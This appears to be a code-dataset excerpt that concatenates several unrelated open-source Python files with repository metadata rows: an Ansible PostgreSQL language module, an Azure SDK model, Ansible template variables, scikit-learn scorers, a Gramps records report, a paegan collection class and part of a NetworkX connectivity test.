query = "SELECT lanpltrusted FROM pg_language WHERE lanname='%s'" % lang
cursor.execute(query)
return cursor.fetchone()[0]
def lang_altertrust(cursor, lang, trust):
"""Changes if language is trusted for db"""
query = "UPDATE pg_language SET lanpltrusted = %s WHERE lanname=%s"
cursor.execute(query, (trust, lang))
return True
def lang_add(cursor, lang, trust):
"""Adds language for db"""
if trust:
query = 'CREATE TRUSTED LANGUAGE "%s"' % lang
else:
query = 'CREATE LANGUAGE "%s"' % lang
cursor.execute(query)
return True
def lang_drop(cursor, lang, cascade):
"""Drops language for db"""
cursor.execute("SAVEPOINT ansible_pgsql_lang_drop")
try:
if cascade:
cursor.execute("DROP LANGUAGE \"%s\" CASCADE" % lang)
else:
cursor.execute("DROP LANGUAGE \"%s\"" % lang)
except Exception:
cursor.execute("ROLLBACK TO SAVEPOINT ansible_pgsql_lang_drop")
cursor.execute("RELEASE SAVEPOINT ansible_pgsql_lang_drop")
return False
cursor.execute("RELEASE SAVEPOINT ansible_pgsql_lang_drop")
return True
def main():
module = AnsibleModule(
argument_spec=dict(
login_user=dict(default="postgres"),
login_password=dict(default="", no_log=True),
login_host=dict(default=""),
login_unix_socket=dict(default=""),
db=dict(required=True),
port=dict(default='5432'),
lang=dict(required=True),
state=dict(default="present", choices=["absent", "present"]),
trust=dict(type='bool', default='no'),
force_trust=dict(type='bool', default='no'),
cascade=dict(type='bool', default='no'),
fail_on_drop=dict(type='bool', default='yes'),
ssl_mode=dict(default='prefer', choices=[
'disable', 'allow', 'prefer', 'require', 'verify-ca', 'verify-full']),
ssl_rootcert=dict(default=None),
),
supports_check_mode=True
)
db = module.params["db"]
lang = module.params["lang"]
state = module.params["state"]
trust = module.params["trust"]
force_trust = module.params["force_trust"]
cascade = module.params["cascade"]
fail_on_drop = module.params["fail_on_drop"]
sslrootcert = module.params["ssl_rootcert"]
if not postgresqldb_found:
module.fail_json(msg="the python psycopg2 module is required")
# To use defaults values, keyword arguments must be absent, so
# check which values are empty and don't include in the **kw
# dictionary
params_map = {
"login_host": "host",
"login_user": "user",
"login_password": "password",
"port": "port",
"db": "database",
"ssl_mode": "sslmode",
"ssl_rootcert": "sslrootcert"
}
kw = dict((params_map[k], v) for (k, v) in iteritems(module.params)
if k in params_map and v != "" and v is not None)
# If a login_unix_socket is specified, incorporate it here.
is_localhost = "host" not in kw or kw["host"] == "" or kw["host"] == "localhost"
if is_localhost and module.params["login_unix_socket"] != "":
kw["host"] = module.params["login_unix_socket"]
if psycopg2.__version__ < '2.4.3' and sslrootcert is not None:
module.fail_json(msg='psycopg2 must be at least 2.4.3 in order to user the ssl_rootcert parameter')
try:
db_connection = psycopg2.connect(**kw)
cursor = db_connection.cursor()
except TypeError as e:
if 'sslrootcert' in e.args[0]:
module.fail_json(msg='Postgresql server must be at least version 8.4 to support sslrootcert')
module.fail_json(msg="unable to connect to database: %s" % to_native(e), exception=traceback.format_exc())
except Exception as e:
module.fail_json(msg="unable to connect to database: %s" % to_native(e), exception=traceback.format_exc())
changed = False
kw = {'db': db, 'lang': lang, 'trust': trust}
if state == "present":
if lang_exists(cursor, lang):
lang_trusted = lang_istrusted(cursor, lang)
if (lang_trusted and not trust) or (not lang_trusted and trust):
if module.check_mode:
changed = True
else:
changed = lang_altertrust(cursor, lang, trust)
else:
if module.check_mode:
changed = True
else:
changed = lang_add(cursor, lang, trust)
if force_trust:
changed = lang_altertrust(cursor, lang, trust)
else:
if lang_exists(cursor, lang):
if module.check_mode:
changed = True
kw['lang_dropped'] = True
else:
changed = lang_drop(cursor, lang, cascade)
if fail_on_drop and not changed:
msg = "unable to drop language, use cascade to delete dependencies or fail_on_drop=no to ignore"
module.fail_json(msg=msg)
kw['lang_dropped'] = changed
if changed:
if module.check_mode:
db_connection.rollback()
else:
db_connection.commit()
kw['changed'] = changed
module.exit_json(**kw)
if __name__ == '__main__':
main()
| gpl-3.0 | 7,644,778,302,881,439,000 | -2,813,020,548,860,137,500 | 34.343558 | 159 | 0.644506 | false |
Azure/azure-sdk-for-python | sdk/applicationinsights/azure-applicationinsights/azure/applicationinsights/models/events_user_info_py3.py | 1 | 1277 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class EventsUserInfo(Model):
"""User info for an event result.
:param id: ID of the user
:type id: str
:param account_id: Account ID of the user
:type account_id: str
:param authenticated_id: Authenticated ID of the user
:type authenticated_id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'account_id': {'key': 'accountId', 'type': 'str'},
'authenticated_id': {'key': 'authenticatedId', 'type': 'str'},
}
def __init__(self, *, id: str=None, account_id: str=None, authenticated_id: str=None, **kwargs) -> None:
super(EventsUserInfo, self).__init__(**kwargs)
self.id = id
self.account_id = account_id
self.authenticated_id = authenticated_id
| mit | -8,814,970,097,250,905,000 | -5,095,124,076,021,987,000 | 34.472222 | 108 | 0.570086 | false |
ptisserand/ansible | lib/ansible/template/vars.py | 39 | 4935 | # (c) 2012, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from collections import Mapping
from jinja2.utils import missing
from ansible.errors import AnsibleError, AnsibleUndefinedVariable
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_native
__all__ = ['AnsibleJ2Vars']
class AnsibleJ2Vars(Mapping):
'''
Helper class to template all variable content before jinja2 sees it. This is
done by hijacking the variable storage that jinja2 uses, and overriding __contains__
and __getitem__ to look like a dict. Added bonus is avoiding duplicating the large
hashes that inject tends to be.
To facilitate using builtin jinja2 things like range, globals are also handled here.
'''
def __init__(self, templar, globals, locals=None, *extras):
'''
Initializes this object with a valid Templar() object, as
well as several dictionaries of variables representing
different scopes (in jinja2 terminology).
'''
self._templar = templar
self._globals = globals
self._extras = extras
self._locals = dict()
if isinstance(locals, dict):
for key, val in iteritems(locals):
if val is not missing:
if key[:2] == 'l_':
self._locals[key[2:]] = val
elif key not in ('context', 'environment', 'template'):
self._locals[key] = val
def __contains__(self, k):
if k in self._templar._available_variables:
return True
if k in self._locals:
return True
for i in self._extras:
if k in i:
return True
if k in self._globals:
return True
return False
def __iter__(self):
keys = set()
keys.update(self._templar._available_variables, self._locals, self._globals, *self._extras)
return iter(keys)
def __len__(self):
keys = set()
keys.update(self._templar._available_variables, self._locals, self._globals, *self._extras)
return len(keys)
def __getitem__(self, varname):
if varname not in self._templar._available_variables:
if varname in self._locals:
return self._locals[varname]
for i in self._extras:
if varname in i:
return i[varname]
if varname in self._globals:
return self._globals[varname]
else:
raise KeyError("undefined variable: %s" % varname)
variable = self._templar._available_variables[varname]
# HostVars is special, return it as-is, as is the special variable
# 'vars', which contains the vars structure
from ansible.vars.hostvars import HostVars
if isinstance(variable, dict) and varname == "vars" or isinstance(variable, HostVars) or hasattr(variable, '__UNSAFE__'):
return variable
else:
value = None
try:
value = self._templar.template(variable)
except AnsibleUndefinedVariable:
raise
except Exception as e:
msg = getattr(e, 'message') or to_native(e)
raise AnsibleError("An unhandled exception occurred while templating '%s'. "
"Error was a %s, original message: %s" % (to_native(variable), type(e), msg))
return value
def add_locals(self, locals):
'''
If locals are provided, create a copy of self containing those
locals in addition to what is already in this variable proxy.
'''
if locals is None:
return self
# FIXME run this only on jinja2>=2.9?
# prior to version 2.9, locals contained all of the vars and not just the current
# local vars so this was not necessary for locals to propagate down to nested includes
new_locals = self._locals.copy()
new_locals.update(locals)
return AnsibleJ2Vars(self._templar, self._globals, locals=new_locals, *self._extras)
| gpl-3.0 | -1,024,561,830,722,893,800 | 801,419,993,277,123,600 | 36.671756 | 129 | 0.619656 | false |
samuel1208/scikit-learn | sklearn/metrics/scorer.py | 211 | 13141 | """
The :mod:`sklearn.metrics.scorer` submodule implements a flexible
interface for model selection and evaluation using
arbitrary score functions.
A scorer object is a callable that can be passed to
:class:`sklearn.grid_search.GridSearchCV` or
:func:`sklearn.cross_validation.cross_val_score` as the ``scoring`` parameter,
to specify how a model should be evaluated.
The signature of the call is ``(estimator, X, y)`` where ``estimator``
is the model to be evaluated, ``X`` is the test data and ``y`` is the
ground truth labeling (or ``None`` in the case of unsupervised models).
"""
# Authors: Andreas Mueller <[email protected]>
# Lars Buitinck <[email protected]>
# Arnaud Joly <[email protected]>
# License: Simplified BSD
from abc import ABCMeta, abstractmethod
from functools import partial
import numpy as np
from . import (r2_score, median_absolute_error, mean_absolute_error,
mean_squared_error, accuracy_score, f1_score,
roc_auc_score, average_precision_score,
precision_score, recall_score, log_loss)
from .cluster import adjusted_rand_score
from ..utils.multiclass import type_of_target
from ..externals import six
from ..base import is_regressor
class _BaseScorer(six.with_metaclass(ABCMeta, object)):
def __init__(self, score_func, sign, kwargs):
self._kwargs = kwargs
self._score_func = score_func
self._sign = sign
@abstractmethod
def __call__(self, estimator, X, y, sample_weight=None):
pass
def __repr__(self):
kwargs_string = "".join([", %s=%s" % (str(k), str(v))
for k, v in self._kwargs.items()])
return ("make_scorer(%s%s%s%s)"
% (self._score_func.__name__,
"" if self._sign > 0 else ", greater_is_better=False",
self._factory_args(), kwargs_string))
def _factory_args(self):
"""Return non-default make_scorer arguments for repr."""
return ""
class _PredictScorer(_BaseScorer):
def __call__(self, estimator, X, y_true, sample_weight=None):
"""Evaluate predicted target values for X relative to y_true.
Parameters
----------
estimator : object
Trained estimator to use for scoring. Must have a predict_proba
method; the output of that is used to compute the score.
X : array-like or sparse matrix
Test data that will be fed to estimator.predict.
y_true : array-like
Gold standard target values for X.
sample_weight : array-like, optional (default=None)
Sample weights.
Returns
-------
score : float
Score function applied to prediction of estimator on X.
"""
y_pred = estimator.predict(X)
if sample_weight is not None:
return self._sign * self._score_func(y_true, y_pred,
sample_weight=sample_weight,
**self._kwargs)
else:
return self._sign * self._score_func(y_true, y_pred,
**self._kwargs)
class _ProbaScorer(_BaseScorer):
def __call__(self, clf, X, y, sample_weight=None):
"""Evaluate predicted probabilities for X relative to y_true.
Parameters
----------
clf : object
Trained classifier to use for scoring. Must have a predict_proba
method; the output of that is used to compute the score.
X : array-like or sparse matrix
Test data that will be fed to clf.predict_proba.
y : array-like
Gold standard target values for X. These must be class labels,
not probabilities.
sample_weight : array-like, optional (default=None)
Sample weights.
Returns
-------
score : float
Score function applied to prediction of estimator on X.
"""
y_pred = clf.predict_proba(X)
if sample_weight is not None:
return self._sign * self._score_func(y, y_pred,
sample_weight=sample_weight,
**self._kwargs)
else:
return self._sign * self._score_func(y, y_pred, **self._kwargs)
def _factory_args(self):
return ", needs_proba=True"
class _ThresholdScorer(_BaseScorer):
def __call__(self, clf, X, y, sample_weight=None):
"""Evaluate decision function output for X relative to y_true.
Parameters
----------
clf : object
Trained classifier to use for scoring. Must have either a
decision_function method or a predict_proba method; the output of
that is used to compute the score.
X : array-like or sparse matrix
Test data that will be fed to clf.decision_function or
clf.predict_proba.
y : array-like
Gold standard target values for X. These must be class labels,
not decision function values.
sample_weight : array-like, optional (default=None)
Sample weights.
Returns
-------
score : float
Score function applied to prediction of estimator on X.
"""
y_type = type_of_target(y)
if y_type not in ("binary", "multilabel-indicator"):
raise ValueError("{0} format is not supported".format(y_type))
if is_regressor(clf):
y_pred = clf.predict(X)
else:
try:
y_pred = clf.decision_function(X)
# For multi-output multi-class estimator
if isinstance(y_pred, list):
y_pred = np.vstack(p for p in y_pred).T
except (NotImplementedError, AttributeError):
y_pred = clf.predict_proba(X)
if y_type == "binary":
y_pred = y_pred[:, 1]
elif isinstance(y_pred, list):
y_pred = np.vstack([p[:, -1] for p in y_pred]).T
if sample_weight is not None:
return self._sign * self._score_func(y, y_pred,
sample_weight=sample_weight,
**self._kwargs)
else:
return self._sign * self._score_func(y, y_pred, **self._kwargs)
def _factory_args(self):
return ", needs_threshold=True"
def get_scorer(scoring):
if isinstance(scoring, six.string_types):
try:
scorer = SCORERS[scoring]
except KeyError:
raise ValueError('%r is not a valid scoring value. '
'Valid options are %s'
% (scoring, sorted(SCORERS.keys())))
else:
scorer = scoring
return scorer
def _passthrough_scorer(estimator, *args, **kwargs):
"""Function that wraps estimator.score"""
return estimator.score(*args, **kwargs)
def check_scoring(estimator, scoring=None, allow_none=False):
"""Determine scorer from user options.
A TypeError will be thrown if the estimator cannot be scored.
Parameters
----------
estimator : estimator object implementing 'fit'
The object to use to fit the data.
scoring : string, callable or None, optional, default: None
A string (see model evaluation documentation) or
a scorer callable object / function with signature
``scorer(estimator, X, y)``.
allow_none : boolean, optional, default: False
If no scoring is specified and the estimator has no score function, we
can either return None or raise an exception.
Returns
-------
scoring : callable
A scorer callable object / function with signature
``scorer(estimator, X, y)``.
"""
has_scoring = scoring is not None
if not hasattr(estimator, 'fit'):
raise TypeError("estimator should a be an estimator implementing "
"'fit' method, %r was passed" % estimator)
elif has_scoring:
return get_scorer(scoring)
elif hasattr(estimator, 'score'):
return _passthrough_scorer
elif allow_none:
return None
else:
raise TypeError(
"If no scoring is specified, the estimator passed should "
"have a 'score' method. The estimator %r does not." % estimator)
def make_scorer(score_func, greater_is_better=True, needs_proba=False,
needs_threshold=False, **kwargs):
"""Make a scorer from a performance metric or loss function.
This factory function wraps scoring functions for use in GridSearchCV
and cross_val_score. It takes a score function, such as ``accuracy_score``,
``mean_squared_error``, ``adjusted_rand_index`` or ``average_precision``
and returns a callable that scores an estimator's output.
Read more in the :ref:`User Guide <scoring>`.
Parameters
----------
score_func : callable,
Score function (or loss function) with signature
``score_func(y, y_pred, **kwargs)``.
greater_is_better : boolean, default=True
Whether score_func is a score function (default), meaning high is good,
or a loss function, meaning low is good. In the latter case, the
scorer object will sign-flip the outcome of the score_func.
needs_proba : boolean, default=False
Whether score_func requires predict_proba to get probability estimates
out of a classifier.
needs_threshold : boolean, default=False
Whether score_func takes a continuous decision certainty.
This only works for binary classification using estimators that
have either a decision_function or predict_proba method.
For example ``average_precision`` or the area under the roc curve
can not be computed using discrete predictions alone.
**kwargs : additional arguments
Additional parameters to be passed to score_func.
Returns
-------
scorer : callable
Callable object that returns a scalar score; greater is better.
Examples
--------
>>> from sklearn.metrics import fbeta_score, make_scorer
>>> ftwo_scorer = make_scorer(fbeta_score, beta=2)
>>> ftwo_scorer
make_scorer(fbeta_score, beta=2)
>>> from sklearn.grid_search import GridSearchCV
>>> from sklearn.svm import LinearSVC
>>> grid = GridSearchCV(LinearSVC(), param_grid={'C': [1, 10]},
... scoring=ftwo_scorer)
"""
sign = 1 if greater_is_better else -1
if needs_proba and needs_threshold:
raise ValueError("Set either needs_proba or needs_threshold to True,"
" but not both.")
if needs_proba:
cls = _ProbaScorer
elif needs_threshold:
cls = _ThresholdScorer
else:
cls = _PredictScorer
return cls(score_func, sign, kwargs)
# Standard regression scores
r2_scorer = make_scorer(r2_score)
mean_squared_error_scorer = make_scorer(mean_squared_error,
greater_is_better=False)
mean_absolute_error_scorer = make_scorer(mean_absolute_error,
greater_is_better=False)
median_absolute_error_scorer = make_scorer(median_absolute_error,
greater_is_better=False)
# Standard Classification Scores
accuracy_scorer = make_scorer(accuracy_score)
f1_scorer = make_scorer(f1_score)
# Score functions that need decision values
roc_auc_scorer = make_scorer(roc_auc_score, greater_is_better=True,
needs_threshold=True)
average_precision_scorer = make_scorer(average_precision_score,
needs_threshold=True)
precision_scorer = make_scorer(precision_score)
recall_scorer = make_scorer(recall_score)
# Score function for probabilistic classification
log_loss_scorer = make_scorer(log_loss, greater_is_better=False,
needs_proba=True)
# Clustering scores
adjusted_rand_scorer = make_scorer(adjusted_rand_score)
SCORERS = dict(r2=r2_scorer,
median_absolute_error=median_absolute_error_scorer,
mean_absolute_error=mean_absolute_error_scorer,
mean_squared_error=mean_squared_error_scorer,
accuracy=accuracy_scorer, roc_auc=roc_auc_scorer,
average_precision=average_precision_scorer,
log_loss=log_loss_scorer,
adjusted_rand_score=adjusted_rand_scorer)
for name, metric in [('precision', precision_score),
('recall', recall_score), ('f1', f1_score)]:
SCORERS[name] = make_scorer(metric)
for average in ['macro', 'micro', 'samples', 'weighted']:
qualified_name = '{0}_{1}'.format(name, average)
SCORERS[qualified_name] = make_scorer(partial(metric, pos_label=None,
average=average))
| bsd-3-clause | 8,861,626,613,151,488,000 | -2,435,399,175,317,932,500 | 35.706704 | 79 | 0.596454 | false |
ennoborg/gramps | gramps/plugins/textreport/recordsreport.py | 9 | 13718 | # encoding:utf-8
#
# Gramps - a GTK+/GNOME based genealogy program - Records plugin
#
# Copyright (C) 2008-2011 Reinhard Müller
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2012 Brian G. Matherly
# Copyright (C) 2013-2016 Paul Franklin
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
""" Records Report """
#------------------------------------------------------------------------
#
# Standard Python modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# Gramps modules
#
#------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.sgettext
from gramps.plugins.lib.librecords import (RECORDS, find_records,
CALLNAME_DONTUSE, CALLNAME_REPLACE,
CALLNAME_UNDERLINE_ADD)
from gramps.gen.plug.docgen import (FontStyle, ParagraphStyle,
FONT_SANS_SERIF, PARA_ALIGN_CENTER,
IndexMark, INDEX_TYPE_TOC)
from gramps.gen.plug.menu import (BooleanOption, EnumeratedListOption,
FilterOption, NumberOption,
PersonOption, StringOption)
from gramps.gen.plug.report import Report
from gramps.gen.plug.report import utils
from gramps.gen.plug.report import MenuReportOptions
from gramps.gen.plug.report import stdoptions
from gramps.gen.lib import Span
from gramps.gen.errors import ReportError
from gramps.gen.proxy import LivingProxyDb, CacheProxyDb
#------------------------------------------------------------------------
#
# Records Report
#
#------------------------------------------------------------------------
class RecordsReport(Report):
""" Records Report """
def __init__(self, database, options, user):
"""
This report needs the following parameters (class variables)
that come in the options class.
incl_private - Whether to include private data
living_people - How to handle living people
years_past_death - Consider as living this many years after death
"""
Report.__init__(self, database, options, user)
menu = options.menu
self.set_locale(options.menu.get_option_by_name('trans').get_value())
stdoptions.run_private_data_option(self, menu)
living_opt = stdoptions.run_living_people_option(self, menu,
self._locale)
self.database = CacheProxyDb(self.database)
self._lv = menu.get_option_by_name('living_people').get_value()
for (value, description) in living_opt.get_items(xml_items=True):
if value == self._lv:
living_desc = self._(description)
break
self.living_desc = self._(
"(Living people: %(option_name)s)") % {'option_name': living_desc}
filter_option = menu.get_option_by_name('filter')
self.filter = filter_option.get_filter()
self.top_size = menu.get_option_by_name('top_size').get_value()
self.callname = menu.get_option_by_name('callname').get_value()
self.footer = menu.get_option_by_name('footer').get_value()
self.include = {}
for (text, varname, default) in RECORDS:
self.include[varname] = menu.get_option_by_name(varname).get_value()
self._nf = stdoptions.run_name_format_option(self, menu)
def write_report(self):
"""
Build the actual report.
"""
records = find_records(self.database, self.filter,
self.top_size, self.callname,
trans_text=self._, name_format=self._nf,
living_mode=self._lv, user=self._user)
self.doc.start_paragraph('REC-Title')
title = self._("Records")
mark = IndexMark(title, INDEX_TYPE_TOC, 1)
self.doc.write_text(title, mark)
self.doc.end_paragraph()
self.doc.start_paragraph('REC-Subtitle')
filter_name = self.filter.get_name(self._locale)
self.doc.write_text("(%s)" % filter_name)
self.doc.end_paragraph()
if self._lv != LivingProxyDb.MODE_INCLUDE_ALL:
self.doc.start_paragraph('REC-Subtitle')
self.doc.write_text(self.living_desc)
self.doc.end_paragraph()
for (text, varname, top) in records:
if not self.include[varname]:
continue
self.doc.start_paragraph('REC-Heading')
self.doc.write_text(self._(text))
self.doc.end_paragraph()
last_value = None
rank = 0
for (number,
(sort, value, name, handletype, handle)) in enumerate(top):
mark = None
if handletype == 'Person':
person = self.database.get_person_from_handle(handle)
mark = utils.get_person_mark(self.database, person)
elif handletype == 'Family':
family = self.database.get_family_from_handle(handle)
# librecords.py checks that the family has both
# a father and a mother and also that each one is
# in the filter if any filter was used, so we don't
# have to do any similar checking here, it's been done
f_handle = family.get_father_handle()
dad = self.database.get_person_from_handle(f_handle)
f_mark = utils.get_person_mark(self.database, dad)
m_handle = family.get_mother_handle()
mom = self.database.get_person_from_handle(m_handle)
m_mark = utils.get_person_mark(self.database, mom)
else:
raise ReportError(_(
"Option '%(opt_name)s' is present "
"in %(file)s\n but is not known to "
"the module. Ignoring...")
% {'opt_name': handletype,
'file': 'libnarrate.py'})
# since the error is very unlikely I reused the string
if value != last_value:
last_value = value
rank = number
self.doc.start_paragraph('REC-Normal')
self.doc.write_text(
self._("%(number)s. ") % {'number': rank+1})
self.doc.write_markup(str(name), name.get_tags(), mark)
if handletype == 'Family':
self.doc.write_text('', f_mark)
self.doc.write_text('', m_mark)
if isinstance(value, Span):
tvalue = value.get_repr(dlocale=self._locale)
else:
tvalue = value
self.doc.write_text(" (%s)" % tvalue)
self.doc.end_paragraph()
self.doc.start_paragraph('REC-Footer')
self.doc.write_text(self.footer)
self.doc.end_paragraph()
#------------------------------------------------------------------------
#
# Records Report Options
#
#------------------------------------------------------------------------
class RecordsReportOptions(MenuReportOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name, dbase):
self.__pid = None
self.__filter = None
self.__db = dbase
self._nf = None
MenuReportOptions.__init__(self, name, dbase)
def get_subject(self):
""" Return a string that describes the subject of the report. """
return self.__filter.get_filter().get_name()
def add_menu_options(self, menu):
category_name = _("Report Options")
self.__filter = FilterOption(_("Filter"), 0)
self.__filter.set_help(
_("Determines what people are included in the report."))
menu.add_option(category_name, "filter", self.__filter)
self.__filter.connect('value-changed', self.__filter_changed)
self.__pid = PersonOption(_("Filter Person"))
self.__pid.set_help(_("The center person for the filter"))
menu.add_option(category_name, "pid", self.__pid)
self.__pid.connect('value-changed', self.__update_filters)
top_size = NumberOption(_("Number of ranks to display"), 3, 1, 100)
menu.add_option(category_name, "top_size", top_size)
callname = EnumeratedListOption(_("Use call name"), CALLNAME_DONTUSE)
callname.set_items([
(CALLNAME_DONTUSE, _("Don't use call name")),
(CALLNAME_REPLACE, _("Replace first names with call name")),
(CALLNAME_UNDERLINE_ADD,
_("Underline call name in first names / "
"add call name to first name"))])
menu.add_option(category_name, "callname", callname)
footer = StringOption(_("Footer text"), "")
menu.add_option(category_name, "footer", footer)
category_name = _("Report Options (2)")
self._nf = stdoptions.add_name_format_option(menu, category_name)
self._nf.connect('value-changed', self.__update_filters)
self.__update_filters()
stdoptions.add_private_data_option(menu, category_name)
stdoptions.add_living_people_option(menu, category_name)
stdoptions.add_localization_option(menu, category_name)
p_count = 0
for (text, varname, default) in RECORDS:
if varname.startswith('person'):
p_count += 1
p_half = p_count // 2
p_idx = 0
for (text, varname, default) in RECORDS:
option = BooleanOption(_(text), default)
if varname.startswith('person'):
if p_idx >= p_half:
category_name = _("Person 2")
else:
category_name = _("Person 1")
p_idx += 1
elif varname.startswith('family'):
category_name = _("Family")
menu.add_option(category_name, varname, option)
def __update_filters(self):
"""
Update the filter list based on the selected person
"""
gid = self.__pid.get_value()
person = self.__db.get_person_from_gramps_id(gid)
nfv = self._nf.get_value()
filter_list = utils.get_person_filters(person,
include_single=False,
name_format=nfv)
self.__filter.set_filters(filter_list)
def __filter_changed(self):
"""
Handle filter change. If the filter is not specific to a person,
disable the person option
"""
filter_value = self.__filter.get_value()
if filter_value == 0: # "Entire Database" (as "include_single=False")
self.__pid.set_available(False)
else:
# The other filters need a center person (assume custom ones too)
self.__pid.set_available(True)
def make_default_style(self, default_style):
#Paragraph Styles
font = FontStyle()
font.set_type_face(FONT_SANS_SERIF)
font.set_size(16)
font.set_bold(True)
para = ParagraphStyle()
para.set_font(font)
para.set_alignment(PARA_ALIGN_CENTER)
para.set_description(_("The style used for the title."))
default_style.add_paragraph_style('REC-Title', para)
font = FontStyle()
font.set_type_face(FONT_SANS_SERIF)
font.set_size(12)
font.set_bold(True)
para = ParagraphStyle()
para.set_font(font)
para.set_alignment(PARA_ALIGN_CENTER)
para.set_description(_("The style used for the subtitle."))
default_style.add_paragraph_style('REC-Subtitle', para)
font = FontStyle()
font.set_size(12)
font.set_bold(True)
para = ParagraphStyle()
para.set_font(font)
para.set_top_margin(utils.pt2cm(6))
para.set_description(_('The style used for the section headers.'))
default_style.add_paragraph_style('REC-Heading', para)
font = FontStyle()
font.set_size(10)
para = ParagraphStyle()
para.set_font(font)
para.set_left_margin(0.5)
para.set_description(_('The basic style used for the text display.'))
default_style.add_paragraph_style('REC-Normal', para)
font = FontStyle()
font.set_size(8)
para = ParagraphStyle()
para.set_font(font)
para.set_alignment(PARA_ALIGN_CENTER)
para.set_top_border(True)
para.set_top_margin(utils.pt2cm(8))
para.set_description(_('The style used for the footer.'))
default_style.add_paragraph_style('REC-Footer', para)
| gpl-2.0 | 518,318,817,104,506,700 | -3,785,294,314,351,827,500 | 38.644509 | 80 | 0.547933 | false |
axiom-data-science/paegan | paegan/cdm/dsg/collections/base/nested_point_collection.py | 3 | 1754 | import itertools
import collections
from paegan.cdm.dsg.collections.base.feature_collection import FeatureCollection
from paegan.cdm.dsg.collections.base.point_collection import PointCollection
from paegan.cdm.dsg.features.base.point import Point
from paegan.utils.asalist import AsaList
class NestedPointCollection(FeatureCollection):
"""
A collection of PointCollections
"""
def __init__(self, **kwargs):
super(NestedPointCollection,self).__init__(**kwargs)
def calculate_bounds(self):
"""
Calculate the time_range, bbox, and size of this collection.
Will scan all data.
Ensures that .size, .bbox and .time_range return non-null.
If the collection already knows its bbox; time_range; and/or size,
they are recomputed.
"""
single_point_collection = PointCollection(elements=list(AsaList.flatten(self)))
single_point_collection.calculate_bounds()
self.bbox = single_point_collection.bbox
self.time_range = single_point_collection.time_range
self.depth_range = single_point_collection.depth_range
self._point_size = single_point_collection.size
self.size = len(self._elements)
def flatten(self):
"""
Returns a Generator of Points that are part of this collection
"""
return AsaList.flatten(self)
def get_point_size(self):
"""
Returns the number of actual Points in this NestedPointCollection
Ex. pc = 10 profiles with 20 bins each will return 200
pc.size = 10
pc.point_size = 200
"""
return self._point_size
point_size = property(get_point_size, None) | gpl-3.0 | -6,216,497,609,527,559,000 | -9,073,078,131,527,198,000 | 34.1 | 87 | 0.650513 | false |
chrisnatali/networkx | networkx/linalg/tests/test_algebraic_connectivity.py | 54 | 10790 | from contextlib import contextmanager
from math import sqrt
import networkx as nx
from nose import SkipTest
from nose.tools import *
methods = ('tracemin_pcg', 'tracemin_chol', 'tracemin_lu', 'lanczos', 'lobpcg')
try:
from numpy.random import get_state, seed, set_state, shuffle
@contextmanager
def save_random_state():
state = get_state()
try:
yield
finally:
set_state(state)
def preserve_random_state(func):
def wrapper(*args, **kwargs):
with save_random_state():
seed(1234567890)
return func(*args, **kwargs)
wrapper.__name__ = func.__name__
return wrapper
except ImportError:
@contextmanager
def save_random_state():
yield
def preserve_random_state(func):
return func
def check_eigenvector(A, l, x):
nx = numpy.linalg.norm(x)
# Check zeroness.
assert_not_almost_equal(nx, 0)
y = A * x
ny = numpy.linalg.norm(y)
# Check collinearity.
assert_almost_equal(numpy.dot(x, y), nx * ny)
# Check eigenvalue.
assert_almost_equal(ny, l * nx)
class TestAlgebraicConnectivity(object):
numpy = 1
@classmethod
def setupClass(cls):
global numpy
try:
import numpy.linalg
import scipy.sparse
except ImportError:
raise SkipTest('SciPy not available.')
@preserve_random_state
def test_directed(self):
G = nx.DiGraph()
for method in self._methods:
assert_raises(nx.NetworkXNotImplemented, nx.algebraic_connectivity,
G, method=method)
assert_raises(nx.NetworkXNotImplemented, nx.fiedler_vector, G,
method=method)
@preserve_random_state
def test_null_and_singleton(self):
G = nx.Graph()
for method in self._methods:
assert_raises(nx.NetworkXError, nx.algebraic_connectivity, G,
method=method)
assert_raises(nx.NetworkXError, nx.fiedler_vector, G,
method=method)
G.add_edge(0, 0)
for method in self._methods:
assert_raises(nx.NetworkXError, nx.algebraic_connectivity, G,
method=method)
assert_raises(nx.NetworkXError, nx.fiedler_vector, G,
method=method)
@preserve_random_state
def test_disconnected(self):
G = nx.Graph()
G.add_nodes_from(range(2))
for method in self._methods:
assert_equal(nx.algebraic_connectivity(G), 0)
assert_raises(nx.NetworkXError, nx.fiedler_vector, G,
method=method)
G.add_edge(0, 1, weight=0)
for method in self._methods:
assert_equal(nx.algebraic_connectivity(G), 0)
assert_raises(nx.NetworkXError, nx.fiedler_vector, G,
method=method)
@preserve_random_state
def test_unrecognized_method(self):
G = nx.path_graph(4)
assert_raises(nx.NetworkXError, nx.algebraic_connectivity, G,
method='unknown')
assert_raises(nx.NetworkXError, nx.fiedler_vector, G, method='unknown')
@preserve_random_state
def test_two_nodes(self):
G = nx.Graph()
G.add_edge(0, 1, weight=1)
A = nx.laplacian_matrix(G)
for method in self._methods:
